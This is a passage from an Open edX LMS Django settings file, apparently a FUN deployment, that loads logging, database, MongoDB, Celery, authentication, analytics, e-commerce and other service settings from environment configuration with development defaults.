formatter=json.loads) LANGUAGE_DICT = dict(LANGUAGES) LANGUAGE_CODE = config("LANGUAGE_CODE", default=LANGUAGE_CODE) USE_I18N = config("USE_I18N", default=USE_I18N) # Additional installed apps for app in config("ADDL_INSTALLED_APPS", default=[], formatter=json.loads): INSTALLED_APPS.append(app) WIKI_ENABLED = config("WIKI_ENABLED", default=WIKI_ENABLED, formatter=bool) local_loglevel = config("LOCAL_LOGLEVEL", default="INFO") # Configure Logging LOG_DIR = config("LOG_DIR", default=path("/edx/var/logs/edx"), formatter=path) DATA_DIR = config("DATA_DIR", default=path("/edx/app/edxapp/data"), formatter=path) # Default format for syslog logging standard_format = "%(asctime)s %(levelname)s %(process)d [%(name)s] %(filename)s:%(lineno)d - %(message)s" syslog_format = ( "[variant:lms][%(name)s][env:sandbox] %(levelname)s " "[{hostname} %(process)d] [%(filename)s:%(lineno)d] - %(message)s" ).format(hostname=platform.node().split(".")[0]) LOGGING = { "version": 1, "disable_existing_loggers": False, "handlers": { "local": { "formatter": "syslog_format", "class": "logging.StreamHandler", "level": "INFO", }, "tracking": { "formatter": "raw", "class": "logging.StreamHandler", "level": "DEBUG", }, "console": { "formatter": "standard", "class": "logging.StreamHandler", "level": "INFO", }, }, "formatters": { "raw": {"format": "%(message)s"}, "syslog_format": {"format": syslog_format}, "standard": {"format": standard_format}, }, "filters": {"require_debug_false": {"()": "django.utils.log.RequireDebugFalse"}}, "loggers": { "": {"level": "INFO", "propagate": False, "handlers": ["console", "local"]}, "tracking": {"level": "DEBUG", "propagate": False, "handlers": ["tracking"]}, }, } SENTRY_DSN = config("SENTRY_DSN", default=None) if SENTRY_DSN: LOGGING["loggers"][""]["handlers"].append("sentry") LOGGING["handlers"]["sentry"] = { "class": "raven.handlers.logging.SentryHandler", "dsn": SENTRY_DSN, "level": "ERROR", "environment": "production", "release": RELEASE, } COURSE_LISTINGS = config("COURSE_LISTINGS", default={}, formatter=json.loads) SUBDOMAIN_BRANDING = config("SUBDOMAIN_BRANDING", default={}, formatter=json.loads) VIRTUAL_UNIVERSITIES = config("VIRTUAL_UNIVERSITIES", default=[]) META_UNIVERSITIES = config("META_UNIVERSITIES", default={}, formatter=json.loads) COMMENTS_SERVICE_URL = config("COMMENTS_SERVICE_URL", default="") COMMENTS_SERVICE_KEY = config("COMMENTS_SERVICE_KEY", default="") CERT_NAME_SHORT = config("CERT_NAME_SHORT", default=CERT_NAME_SHORT) CERT_NAME_LONG = config("CERT_NAME_LONG", default=CERT_NAME_LONG) CERT_QUEUE = config("CERT_QUEUE", default="test-pull") ZENDESK_URL = config("ZENDESK_URL", default=None) FEEDBACK_SUBMISSION_EMAIL = config("FEEDBACK_SUBMISSION_EMAIL", default=None) MKTG_URLS = config("MKTG_URLS", default=MKTG_URLS, formatter=json.loads) # Badgr API BADGR_API_TOKEN = config("BADGR_API_TOKEN", default=BADGR_API_TOKEN) BADGR_BASE_URL = config("BADGR_BASE_URL", default=BADGR_BASE_URL) BADGR_ISSUER_SLUG = config("BADGR_ISSUER_SLUG", default=BADGR_ISSUER_SLUG) # git repo loading environment GIT_REPO_DIR = config( "GIT_REPO_DIR", default=path("/edx/var/edxapp/course_repos"), formatter=path ) GIT_IMPORT_STATIC = config("GIT_IMPORT_STATIC", default=True) for name, value in config("CODE_JAIL", default={}, formatter=json.loads).items(): oldvalue = CODE_JAIL.get(name) if isinstance(oldvalue, dict): for subname, subvalue in value.items(): oldvalue[subname] = subvalue else: CODE_JAIL[name] = value COURSES_WITH_UNSAFE_CODE = config( "COURSES_WITH_UNSAFE_CODE", default=[], formatter=json.loads ) ASSET_IGNORE_REGEX = config("ASSET_IGNORE_REGEX", default=ASSET_IGNORE_REGEX) # Event Tracking TRACKING_IGNORE_URL_PATTERNS = config( "TRACKING_IGNORE_URL_PATTERNS", default=TRACKING_IGNORE_URL_PATTERNS, formatter=json.loads, ) # SSL external authentication settings SSL_AUTH_EMAIL_DOMAIN = config("SSL_AUTH_EMAIL_DOMAIN", default="MIT.EDU") SSL_AUTH_DN_FORMAT_STRING = config("SSL_AUTH_DN_FORMAT_STRING", default=None) # Django CAS external authentication settings CAS_EXTRA_LOGIN_PARAMS = config( "CAS_EXTRA_LOGIN_PARAMS", default=None, formatter=json.loads ) if FEATURES.get("AUTH_USE_CAS"): CAS_SERVER_URL = config("CAS_SERVER_URL", default=None) INSTALLED_APPS.append("django_cas") MIDDLEWARE_CLASSES.append("django_cas.middleware.CASMiddleware") CAS_ATTRIBUTE_CALLBACK = config( "CAS_ATTRIBUTE_CALLBACK", default=None, formatter=json.loads ) if CAS_ATTRIBUTE_CALLBACK: import importlib CAS_USER_DETAILS_RESOLVER = getattr( importlib.import_module(CAS_ATTRIBUTE_CALLBACK["module"]), CAS_ATTRIBUTE_CALLBACK["function"], ) # Video Caching. Pairing country codes with CDN URLs. # Example: {'CN': 'http://api.xuetangx.com/edx/video?s3_url='} VIDEO_CDN_URL = config("VIDEO_CDN_URL", default={}, formatter=json.loads) # Branded footer FOOTER_OPENEDX_URL = config("FOOTER_OPENEDX_URL", default=FOOTER_OPENEDX_URL) FOOTER_OPENEDX_LOGO_IMAGE = config( "FOOTER_OPENEDX_LOGO_IMAGE", default=FOOTER_OPENEDX_LOGO_IMAGE ) FOOTER_ORGANIZATION_IMAGE = config( "FOOTER_ORGANIZATION_IMAGE", default=FOOTER_ORGANIZATION_IMAGE ) FOOTER_CACHE_TIMEOUT = config( "FOOTER_CACHE_TIMEOUT", default=FOOTER_CACHE_TIMEOUT, formatter=int ) FOOTER_BROWSER_CACHE_MAX_AGE = config( "FOOTER_BROWSER_CACHE_MAX_AGE", default=FOOTER_BROWSER_CACHE_MAX_AGE, formatter=int ) # Credit notifications settings NOTIFICATION_EMAIL_CSS = config( "NOTIFICATION_EMAIL_CSS", default=NOTIFICATION_EMAIL_CSS ) NOTIFICATION_EMAIL_EDX_LOGO = config( "NOTIFICATION_EMAIL_EDX_LOGO", default=NOTIFICATION_EMAIL_EDX_LOGO ) ############# CORS headers for cross-domain requests ################# if FEATURES.get("ENABLE_CORS_HEADERS") or FEATURES.get( "ENABLE_CROSS_DOMAIN_CSRF_COOKIE" ): CORS_ALLOW_CREDENTIALS = True CORS_ORIGIN_WHITELIST = config( "CORS_ORIGIN_WHITELIST", default=(), formatter=json.loads ) CORS_ORIGIN_ALLOW_ALL = config( "CORS_ORIGIN_ALLOW_ALL", default=False, formatter=bool ) CORS_ALLOW_INSECURE = config("CORS_ALLOW_INSECURE", default=False, formatter=bool) # If setting a cross-domain cookie, it's really important to choose # a name for the cookie that is DIFFERENT than the cookies used # by each subdomain. For example, suppose the applications # at these subdomains are configured to use the following cookie names: # # 1) foo.example.com --> "csrftoken" # 2) baz.example.com --> "csrftoken" # 3) bar.example.com --> "csrftoken" # # For the cross-domain version of the CSRF cookie, you need to choose # a name DIFFERENT than "csrftoken"; otherwise, the new token configured # for ".example.com" could conflict with the other cookies, # non-deterministically causing 403 responses. # # Because of the way Django stores cookies, the cookie name MUST # be a `str`, not unicode. Otherwise there will `TypeError`s will be raised # when Django tries to call the unicode `translate()` method with the wrong # number of parameters. CROSS_DOMAIN_CSRF_COOKIE_NAME = str(config("CROSS_DOMAIN_CSRF_COOKIE_NAME")) # When setting the domain for the "cross-domain" version of the CSRF # cookie, you should choose something like: ".example.com" # (note the leading dot), where both the referer and the host # are subdomains of "example.com". # # Browser security rules require that # the cookie domain matches the domain of the server; otherwise # the cookie won't get set. And once the cookie gets set, the client # needs to be on a domain that matches the cookie domain, otherwise # the client won't be able to read the cookie. CROSS_DOMAIN_CSRF_COOKIE_DOMAIN = config("CROSS_DOMAIN_CSRF_COOKIE_DOMAIN") # Field overrides. To use the IDDE feature, add # 'courseware.student_field_overrides.IndividualStudentOverrideProvider'. FIELD_OVERRIDE_PROVIDERS = tuple( config("FIELD_OVERRIDE_PROVIDERS", default=[], formatter=json.loads) ) ############################## SECURE AUTH ITEMS ############### # Secret things: passwords, access keys, etc. ############### XBlock filesystem field config ########## DJFS = config( "DJFS", default={ "directory_root": "/edx/var/edxapp/django-pyfs/static/django-pyfs", "type": "osfs", "url_root": "/static/django-pyfs", }, formatter=json.loads, ) ############### Module Store Items ########## HOSTNAME_MODULESTORE_DEFAULT_MAPPINGS = config( "HOSTNAME_MODULESTORE_DEFAULT_MAPPINGS", default={}, formatter=json.loads ) # PREVIEW DOMAIN must be present in HOSTNAME_MODULESTORE_DEFAULT_MAPPINGS for the preview to show draft changes if "PREVIEW_LMS_BASE" in FEATURES and FEATURES["PREVIEW_LMS_BASE"] != "": PREVIEW_DOMAIN = FEATURES["PREVIEW_LMS_BASE"].split(":")[0] # update dictionary with preview domain regex HOSTNAME_MODULESTORE_DEFAULT_MAPPINGS.update({PREVIEW_DOMAIN: "draft-preferred"}) ############### Mixed Related(Secure/Not-Secure) Items ########## LMS_SEGMENT_KEY = config("LMS_SEGMENT_KEY", default=None) CC_PROCESSOR_NAME = config("CC_PROCESSOR_NAME", default=CC_PROCESSOR_NAME) CC_PROCESSOR = config("CC_PROCESSOR", default=CC_PROCESSOR) SECRET_KEY = config("SECRET_KEY", default="ThisisAnExampleKeyForDevPurposeOnly") # Authentication backends # - behind a proxy, use: "lms.envs.fun.backends.ProxyRateLimitModelBackend" # - for LTI provider, add: "lti_provider.users.LtiBackend" # - for CAS, add: "django_cas.backends.CASBackend" AUTHENTICATION_BACKENDS = config( "AUTHENTICATION_BACKENDS", default=("lms.envs.fun.backends.ProxyRateLimitModelBackend",), ) DEFAULT_FILE_STORAGE = config( "DEFAULT_FILE_STORAGE", default="django.core.files.storage.FileSystemStorage" ) # Specific setting for the File Upload Service to store media in a bucket. FILE_UPLOAD_STORAGE_BUCKET_NAME = config( "FILE_UPLOAD_STORAGE_BUCKET_NAME", default="uploads" ) FILE_UPLOAD_STORAGE_PREFIX = config( "FILE_UPLOAD_STORAGE_PREFIX", default=FILE_UPLOAD_STORAGE_PREFIX ) # If there is a database called 'read_replica', you can use the use_read_replica_if_available # function in util/query.py, which is useful for very large database reads DATABASE_ENGINE = config("DATABASE_ENGINE", default="django.db.backends.mysql") DATABASE_HOST = config("DATABASE_HOST", default="mysql") DATABASE_PORT = config("DATABASE_PORT", default=3306, formatter=int) DATABASE_NAME = config("DATABASE_NAME", default="edxapp") DATABASE_USER = config("DATABASE_USER", default="edxapp_user") DATABASE_PASSWORD = config("DATABASE_PASSWORD", default="password") DATABASES = config( "DATABASES", default={ "default": { "ENGINE": DATABASE_ENGINE, "HOST": DATABASE_HOST, "PORT": DATABASE_PORT, "NAME": DATABASE_NAME, "USER": DATABASE_USER, "PASSWORD": DATABASE_PASSWORD, } }, formatter=json.loads, ) # Enable automatic transaction management on all databases # https://docs.djangoproject.com/en/1.8/topics/db/transactions/#tying-transactions-to-http-requests # This needs to be true for all databases for database_name in DATABASES: DATABASES[database_name]["ATOMIC_REQUESTS"] = True XQUEUE_INTERFACE = config( "XQUEUE_INTERFACE", default={"url": None, "basic_auth": None, "django_auth": None}, formatter=json.loads, ) # Configure the MODULESTORE MODULESTORE = convert_module_store_setting_if_needed( config("MODULESTORE", default=MODULESTORE, formatter=json.loads) ) MONGODB_PASSWORD = config("MONGODB_PASSWORD", default="") MONGODB_HOST = config("MONGODB_HOST", default="mongodb") MONGODB_PORT = config("MONGODB_PORT", default=27017, formatter=int) MONGODB_NAME = config("MONGODB_NAME", default="edxapp") MONGODB_USER = config("MONGODB_USER", default=None) MONGODB_SSL = config("MONGODB_SSL", default=False, formatter=bool) MONGODB_REPLICASET = config("MONGODB_REPLICASET", default=None) # Accepted read_preference value can be found here https://github.com/mongodb/mongo-python-driver/blob/2.9.1/pymongo/read_preferences.py#L54 MONGODB_READ_PREFERENCE = config("MONGODB_READ_PREFERENCE", default="PRIMARY") DOC_STORE_CONFIG = config( "DOC_STORE_CONFIG", default={ "collection": "modulestore", "host": MONGODB_HOST, "port": MONGODB_PORT, "db": MONGODB_NAME, "user": MONGODB_USER, "password": <PASSWORD>, "ssl": MONGODB_SSL, "replicaSet": MONGODB_REPLICASET, "read_preference": MONGODB_READ_PREFERENCE, }, formatter=json.loads, ) update_module_store_settings(MODULESTORE, doc_store_settings=DOC_STORE_CONFIG) MONGODB_LOG = config("MONGODB_LOG", default={}, formatter=json.loads) CONTENTSTORE = config( "CONTENTSTORE", default={ "DOC_STORE_CONFIG": DOC_STORE_CONFIG, "ENGINE": "xmodule.contentstore.mongo.MongoContentStore", }, formatter=json.loads, ) EMAIL_HOST_USER = config("EMAIL_HOST_USER", default="") # django default is '' EMAIL_HOST_PASSWORD = config("EMAIL_HOST_PASSWORD", default="") # django default is '' # Datadog for events! DATADOG = config("DATADOG", default={}, formatter=json.loads) # TODO: deprecated (compatibility with previous settings) DATADOG_API = config("DATADOG_API", default=None) # Analytics dashboard server ANALYTICS_SERVER_URL = config("ANALYTICS_SERVER_URL", default=None) ANALYTICS_API_KEY = config("ANALYTICS_API_KEY", default="") # Analytics data source ANALYTICS_DATA_URL = config("ANALYTICS_DATA_URL", default=ANALYTICS_DATA_URL) ANALYTICS_DATA_TOKEN = config("ANALYTICS_DATA_TOKEN", default=ANALYTICS_DATA_TOKEN) # Analytics Dashboard # when True this setting add a link in instructor dashbord to analytics insight service ANALYTICS_DASHBOARD_URL = config( "ANALYTICS_DASHBOARD_URL", default=False, formatter=bool ) ANALYTICS_DASHBOARD_NAME = config( "ANALYTICS_DASHBOARD_NAME", default=PLATFORM_NAME + " Insights" ) # Mailchimp New User List MAILCHIMP_NEW_USER_LIST_ID = config("MAILCHIMP_NEW_USER_LIST_ID", default=None) # Zendesk ZENDESK_USER = config("ZENDESK_USER", default=None) ZENDESK_API_KEY = config("ZENDESK_API_KEY", default=None) # API Key for inbound requests from Notifier service EDX_API_KEY = config("EDX_API_KEY", default=None) # Celery Broker # For redis sentinel use the redis-sentinel transport CELERY_BROKER_TRANSPORT = config("CELERY_BROKER_TRANSPORT", default="redis") CELERY_BROKER_USER = config("CELERY_BROKER_USER", default="") CELERY_BROKER_PASSWORD = config("CELERY_BROKER_PASSWORD", default="") CELERY_BROKER_HOST = config("CELERY_BROKER_HOST", default="redis") CELERY_BROKER_PORT = config("CELERY_BROKER_PORT", default=6379, formatter=int) CELERY_BROKER_VHOST = config("CELERY_BROKER_VHOST", default=0, formatter=int) if CELERY_BROKER_TRANSPORT == "redis-sentinel": # register redis sentinel schema in celery register() BROKER_URL = "{transport}://{user}:{password}@{host}:{port}/{vhost}".format( transport=CELERY_BROKER_TRANSPORT, user=CELERY_BROKER_USER, password=<PASSWORD>, host=CELERY_BROKER_HOST, port=CELERY_BROKER_PORT, vhost=CELERY_BROKER_VHOST, ) # To use redis-sentinel, refer to the documenation here # https://celery-redis-sentinel.readthedocs.io/en/latest/ BROKER_TRANSPORT_OPTIONS = config( "BROKER_TRANSPORT_OPTIONS", default={}, formatter=json.loads ) # upload limits STUDENT_FILEUPLOAD_MAX_SIZE = config( "STUDENT_FILEUPLOAD_MAX_SIZE", default=STUDENT_FILEUPLOAD_MAX_SIZE, formatter=int ) # Event tracking TRACKING_BACKENDS.update(config("TRACKING_BACKENDS", default={}, formatter=json.loads)) EVENT_TRACKING_BACKENDS["tracking_logs"]["OPTIONS"]["backends"].update( config("EVENT_TRACKING_BACKENDS", default={}, formatter=json.loads) ) EVENT_TRACKING_BACKENDS["segmentio"]["OPTIONS"]["processors"][0]["OPTIONS"][ "whitelist" ].extend( config("EVENT_TRACKING_SEGMENTIO_EMIT_WHITELIST", default=[], formatter=json.loads) ) TRACKING_SEGMENTIO_WEBHOOK_SECRET = config( "TRACKING_SEGMENTIO_WEBHOOK_SECRET", default=TRACKING_SEGMENTIO_WEBHOOK_SECRET ) TRACKING_SEGMENTIO_ALLOWED_TYPES = config( "TRACKING_SEGMENTIO_ALLOWED_TYPES", default=TRACKING_SEGMENTIO_ALLOWED_TYPES, formatter=json.loads, ) TRACKING_SEGMENTIO_DISALLOWED_SUBSTRING_NAMES = config( "TRACKING_SEGMENTIO_DISALLOWED_SUBSTRING_NAMES", default=TRACKING_SEGMENTIO_DISALLOWED_SUBSTRING_NAMES, formatter=json.loads, ) TRACKING_SEGMENTIO_SOURCE_MAP = config( "TRACKING_SEGMENTIO_SOURCE_MAP", default=TRACKING_SEGMENTIO_SOURCE_MAP, formatter=json.loads, ) # Student identity verification settings VERIFY_STUDENT = config("VERIFY_STUDENT", default=VERIFY_STUDENT, formatter=json.loads) # Grades download GRADES_DOWNLOAD_ROUTING_KEY = config( "GRADES_DOWNLOAD_ROUTING_KEY", default=HIGH_MEM_QUEUE ) GRADES_DOWNLOAD = config( "GRADES_DOWNLOAD", default=GRADES_DOWNLOAD, formatter=json.loads ) GRADES_DOWNLOAD = config("GRADES_DOWNLOAD", default=GRADES_DOWNLOAD) # financial reports FINANCIAL_REPORTS = config( "FINANCIAL_REPORTS", default=FINANCIAL_REPORTS, formatter=json.loads ) ##### ACCOUNT LOCKOUT DEFAULT PARAMETERS ##### MAX_FAILED_LOGIN_ATTEMPTS_ALLOWED = config( "MAX_FAILED_LOGIN_ATTEMPTS_ALLOWED", default=5, formatter=int ) MAX_FAILED_LOGIN_ATTEMPTS_LOCKOUT_PERIOD_SECS = config( "MAX_FAILED_LOGIN_ATTEMPTS_LOCKOUT_PERIOD_SECS", default=15 * 60, formatter=int ) MICROSITE_CONFIGURATION = config( "MICROSITE_CONFIGURATION", default={}, formatter=json.loads ) MICROSITE_ROOT_DIR = path(config("MICROSITE_ROOT_DIR", default="")) #### PASSWORD POLICY SETTINGS ##### PASSWORD_MIN_LENGTH = config("PASSWORD_MIN_LENGTH", default=12, formatter=int) PASSWORD_MAX_LENGTH = config("PASSWORD_MAX_LENGTH", default=None, formatter=int) PASSWORD_COMPLEXITY = config( "PASSWORD_COMPLEXITY", default={"UPPER": 1, "LOWER": 1, "DIGITS": 1}, formatter=json.loads, ) PASSWORD_DICTIONARY_EDIT_DISTANCE_THRESHOLD = config( "PASSWORD_DICTIONARY_EDIT_DISTANCE_THRESHOLD", default=PASSWORD_DICTIONARY_EDIT_DISTANCE_THRESHOLD, formatter=int, ) PASSWORD_DICTIONARY = config("PASSWORD_DICTIONARY", default=[], formatter=json.loads) ### INACTIVITY SETTINGS #### SESSION_INACTIVITY_TIMEOUT_IN_SECONDS = config( "SESSION_INACTIVITY_TIMEOUT_IN_SECONDS", default=None, formatter=int ) ##### LMS DEADLINE DISPLAY TIME_ZONE ####### TIME_ZONE_DISPLAYED_FOR_DEADLINES = config( "TIME_ZONE_DISPLAYED_FOR_DEADLINES", default=TIME_ZONE_DISPLAYED_FOR_DEADLINES ) ##### X-Frame-Options response header settings ##### X_FRAME_OPTIONS = config("X_FRAME_OPTIONS", default=X_FRAME_OPTIONS) ##### Third-party auth options ################################################ if FEATURES.get("ENABLE_THIRD_PARTY_AUTH"): # The reduced session expiry time during the third party login pipeline. (Value in seconds) SOCIAL_AUTH_PIPELINE_TIMEOUT = config("SOCIAL_AUTH_PIPELINE_TIMEOUT", default=600) # The SAML private/public key values do not need the delimiter lines (such as # "-----BEGIN PRIVATE KEY-----", default="-----END PRIVATE KEY-----" etc.) but they may be included # if you want (though it's easier to format the key values as JSON without the delimiters). SOCIAL_AUTH_SAML_SP_PRIVATE_KEY = config( "SOCIAL_AUTH_SAML_SP_PRIVATE_KEY", default="" ) SOCIAL_AUTH_SAML_SP_PUBLIC_CERT = config( "SOCIAL_AUTH_SAML_SP_PUBLIC_CERT", default="" ) SOCIAL_AUTH_OAUTH_SECRETS = config( "SOCIAL_AUTH_OAUTH_SECRETS", default={}, formatter=json.loads ) SOCIAL_AUTH_LTI_CONSUMER_SECRETS = config( "SOCIAL_AUTH_LTI_CONSUMER_SECRETS", default={}, formatter=json.loads ) # third_party_auth config moved to ConfigurationModels. This is for data migration only: THIRD_PARTY_AUTH_OLD_CONFIG = config("THIRD_PARTY_AUTH", default=None) if ( config("THIRD_PARTY_AUTH_SAML_FETCH_PERIOD_HOURS", default=24, formatter=int) is not None ): CELERYBEAT_SCHEDULE["refresh-saml-metadata"] = { "task": "third_party_auth.fetch_saml_metadata", "schedule": datetime.timedelta( hours=config( "THIRD_PARTY_AUTH_SAML_FETCH_PERIOD_HOURS", default=24, formatter=int, ) ), } # The following can be used to integrate a custom login form with third_party_auth. # It should be a dict where the key is a word passed via ?auth_entry=, and the value is a # dict with an arbitrary 'secret_key' and a 'url'. THIRD_PARTY_AUTH_CUSTOM_AUTH_FORMS = config( "THIRD_PARTY_AUTH_CUSTOM_AUTH_FORMS", default={}, formatter=json.loads ) ##### OAUTH2 Provider ############## if FEATURES.get("ENABLE_OAUTH2_PROVIDER"): OAUTH_OIDC_ISSUER = config("OAUTH_OIDC_ISSUER", default=None) OAUTH_ENFORCE_SECURE = config("OAUTH_ENFORCE_SECURE", default=True, formatter=bool) OAUTH_ENFORCE_CLIENT_SECURE = config( "OAUTH_ENFORCE_CLIENT_SECURE", default=True, formatter=bool ) ##### ADVANCED_SECURITY_CONFIG ##### ADVANCED_SECURITY_CONFIG = config( "ADVANCED_SECURITY_CONFIG", default={}, formatter=json.loads ) ##### GOOGLE ANALYTICS IDS ##### GOOGLE_ANALYTICS_ACCOUNT = config("GOOGLE_ANALYTICS_ACCOUNT", default=None) GOOGLE_ANALYTICS_LINKEDIN = config("GOOGLE_ANALYTICS_LINKEDIN", default=None) ##### OPTIMIZELY PROJECT ID ##### OPTIMIZELY_PROJECT_ID = config("OPTIMIZELY_PROJECT_ID", default=OPTIMIZELY_PROJECT_ID) #### Course Registration Code length #### REGISTRATION_CODE_LENGTH = config("REGISTRATION_CODE_LENGTH", default=8, formatter=int) # REGISTRATION CODES DISPLAY INFORMATION INVOICE_CORP_ADDRESS = config("INVOICE_CORP_ADDRESS", default=INVOICE_CORP_ADDRESS) INVOICE_PAYMENT_INSTRUCTIONS = config( "INVOICE_PAYMENT_INSTRUCTIONS", default=INVOICE_PAYMENT_INSTRUCTIONS ) # Which access.py permission names to check; # We default this to the legacy permission 'see_exists'. COURSE_CATALOG_VISIBILITY_PERMISSION = config( "COURSE_CATALOG_VISIBILITY_PERMISSION", default=COURSE_CATALOG_VISIBILITY_PERMISSION ) COURSE_ABOUT_VISIBILITY_PERMISSION = config( "COURSE_ABOUT_VISIBILITY_PERMISSION", default=COURSE_ABOUT_VISIBILITY_PERMISSION ) # Enrollment API Cache Timeout ENROLLMENT_COURSE_DETAILS_CACHE_TIMEOUT = config( "ENROLLMENT_COURSE_DETAILS_CACHE_TIMEOUT", default=60, formatter=int ) # PDF RECEIPT/INVOICE OVERRIDES PDF_RECEIPT_TAX_ID = config("PDF_RECEIPT_TAX_ID", default=PDF_RECEIPT_TAX_ID) PDF_RECEIPT_FOOTER_TEXT = config( "PDF_RECEIPT_FOOTER_TEXT", default=PDF_RECEIPT_FOOTER_TEXT ) PDF_RECEIPT_DISCLAIMER_TEXT = config( "PDF_RECEIPT_DISCLAIMER_TEXT", default=PDF_RECEIPT_DISCLAIMER_TEXT ) PDF_RECEIPT_BILLING_ADDRESS = config( "PDF_RECEIPT_BILLING_ADDRESS", default=PDF_RECEIPT_BILLING_ADDRESS ) PDF_RECEIPT_TERMS_AND_CONDITIONS = config( "PDF_RECEIPT_TERMS_AND_CONDITIONS", default=PDF_RECEIPT_TERMS_AND_CONDITIONS ) PDF_RECEIPT_TAX_ID_LABEL = config( "PDF_RECEIPT_TAX_ID_LABEL", default=PDF_RECEIPT_TAX_ID_LABEL ) PDF_RECEIPT_LOGO_PATH = config("PDF_RECEIPT_LOGO_PATH", default=PDF_RECEIPT_LOGO_PATH) PDF_RECEIPT_COBRAND_LOGO_PATH = config( "PDF_RECEIPT_COBRAND_LOGO_PATH", default=PDF_RECEIPT_COBRAND_LOGO_PATH ) PDF_RECEIPT_LOGO_HEIGHT_MM = config( "PDF_RECEIPT_LOGO_HEIGHT_MM", default=PDF_RECEIPT_LOGO_HEIGHT_MM, formatter=int ) PDF_RECEIPT_COBRAND_LOGO_HEIGHT_MM = config( "PDF_RECEIPT_COBRAND_LOGO_HEIGHT_MM", default=PDF_RECEIPT_COBRAND_LOGO_HEIGHT_MM, formatter=int, ) if ( FEATURES.get("ENABLE_COURSEWARE_SEARCH") or FEATURES.get("ENABLE_DASHBOARD_SEARCH") or FEATURES.get("ENABLE_COURSE_DISCOVERY") or FEATURES.get("ENABLE_TEAMS") ): # Use ElasticSearch as the search engine herein SEARCH_ENGINE = "search.elastic.ElasticSearchEngine" ELASTIC_SEARCH_CONFIG = config( "ELASTIC_SEARCH_CONFIG", default=[{}], formatter=json.loads ) # Facebook app FACEBOOK_API_VERSION = config("FACEBOOK_API_VERSION", default=None) FACEBOOK_APP_SECRET = config("FACEBOOK_APP_SECRET", default=None) FACEBOOK_APP_ID = config("FACEBOOK_APP_ID", default=None) XBLOCK_SETTINGS = config("XBLOCK_SETTINGS", default={}, formatter=json.loads) XBLOCK_SETTINGS.setdefault("VideoDescriptor", {})["licensing_enabled"] = FEATURES.get( "LICENSING", False ) XBLOCK_SETTINGS.setdefault("VideoModule", {})["YOUTUBE_API_KEY"] = config( "YOUTUBE_API_KEY", default=YOUTUBE_API_KEY ) ##### CDN EXPERIMENT/MONITORING FLAGS ##### CDN_VIDEO_URLS = config("CDN_VIDEO_URLS", default=CDN_VIDEO_URLS) ONLOAD_BEACON_SAMPLE_RATE = config( "ONLOAD_BEACON_SAMPLE_RATE", default=ONLOAD_BEACON_SAMPLE_RATE ) ##### ECOMMERCE API CONFIGURATION SETTINGS ##### ECOMMERCE_PUBLIC_URL_ROOT = config( "ECOMMERCE_PUBLIC_URL_ROOT", default=ECOMMERCE_PUBLIC_URL_ROOT ) ECOMMERCE_API_URL = config("ECOMMERCE_API_URL", default=ECOMMERCE_API_URL) ECOMMERCE_API_TIMEOUT = config( "ECOMMERCE_API_TIMEOUT", default=ECOMMERCE_API_TIMEOUT, formatter=int ) ECOMMERCE_SERVICE_WORKER_USERNAME = config( "ECOMMERCE_SERVICE_WORKER_USERNAME", default=ECOMMERCE_SERVICE_WORKER_USERNAME ) ECOMMERCE_API_TIMEOUT = config("ECOMMERCE_API_TIMEOUT", default=ECOMMERCE_API_TIMEOUT) ECOMMERCE_API_SIGNING_KEY = config( "ECOMMERCE_API_SIGNING_KEY", default=ECOMMERCE_API_SIGNING_KEY ) ##### Custom Courses for EdX ##### if FEATURES.get("CUSTOM_COURSES_EDX"): INSTALLED_APPS += ("lms.djangoapps.ccx",) FIELD_OVERRIDE_PROVIDERS += ( "lms.djangoapps.ccx.overrides.CustomCoursesForEdxOverrideProvider", ) CCX_MAX_STUDENTS_ALLOWED = config( "CCX_MAX_STUDENTS_ALLOWED", default=CCX_MAX_STUDENTS_ALLOWED ) ##### Individual Due Date Extensions ##### if FEATURES.get("INDIVIDUAL_DUE_DATES"): FIELD_OVERRIDE_PROVIDERS += ( "courseware.student_field_overrides.IndividualStudentOverrideProvider", ) ##### Self-Paced Course Due Dates ##### FIELD_OVERRIDE_PROVIDERS += ( "courseware.self_paced_overrides.SelfPacedDateOverrideProvider", ) # PROFILE IMAGE CONFIG PROFILE_IMAGE_BACKEND = config("PROFILE_IMAGE_BACKEND", default=PROFILE_IMAGE_BACKEND) PROFILE_IMAGE_SECRET_KEY = config( "PROFILE_IMAGE_SECRET_KEY", default=PROFILE_IMAGE_SECRET_KEY ) PROFILE_IMAGE_MAX_BYTES = config( "PROFILE_IMAGE_MAX_BYTES", default=PROFILE_IMAGE_MAX_BYTES, formatter=int ) PROFILE_IMAGE_MIN_BYTES = config( "PROFILE_IMAGE_MIN_BYTES", default=PROFILE_IMAGE_MIN_BYTES, formatter=int ) PROFILE_IMAGE_DEFAULT_FILENAME = "images/profiles/default" # EdxNotes config EDXNOTES_PUBLIC_API = config("EDXNOTES_PUBLIC_API", default=EDXNOTES_PUBLIC_API) EDXNOTES_INTERNAL_API = config("EDXNOTES_INTERNAL_API", default=EDXNOTES_INTERNAL_API) ##### Credit Provider Integration ##### CREDIT_PROVIDER_SECRET_KEYS = config( "CREDIT_PROVIDER_SECRET_KEYS", default={}, formatter=json.loads ) ##################### LTI Provider ##################### if FEATURES.get("ENABLE_LTI_PROVIDER"): INSTALLED_APPS += ("lti_provider",) LTI_USER_EMAIL_DOMAIN = config("LTI_USER_EMAIL_DOMAIN", default="lti.example.com") # For more info on this, see the notes in common.py LTI_AGGREGATE_SCORE_PASSBACK_DELAY = config( "LTI_AGGREGATE_SCORE_PASSBACK_DELAY", default=LTI_AGGREGATE_SCORE_PASSBACK_DELAY ) ##################### Credit Provider help link #################### CREDIT_HELP_LINK_URL = config("CREDIT_HELP_LINK_URL", default=CREDIT_HELP_LINK_URL) #### JWT configuration #### JWT_ISSUER = config("JWT_ISSUER", default=JWT_ISSUER) JWT_EXPIRATION = config("JWT_EXPIRATION", default=JWT_EXPIRATION) ################# PROCTORING CONFIGURATION ################## PROCTORING_BACKEND_PROVIDER = config( "PROCTORING_BACKEND_PROVIDER", default=PROCTORING_BACKEND_PROVIDER ) PROCTORING_SETTINGS = config( "PROCTORING_SETTINGS", default=PROCTORING_SETTINGS, formatter=json.loads ) ################# MICROSITE #################### MICROSITE_CONFIGURATION = config( "MICROSITE_CONFIGURATION", default={}, formatter=json.loads ) MICROSITE_ROOT_DIR = path(config("MICROSITE_ROOT_DIR", default="")) # Cutoff date for granting audit certificates if config("AUDIT_CERT_CUTOFF_DATE", default=None): AUDIT_CERT_CUTOFF_DATE = dateutil.parser.parse( config("AUDIT_CERT_CUTOFF_DATE", default=AUDIT_CERT_CUTOFF_DATE) ) ################ CONFIGURABLE LTI CONSUMER ############### # Add just the standard LTI consumer by default, forcing it to open in a new window and ask # the user before sending email and username: 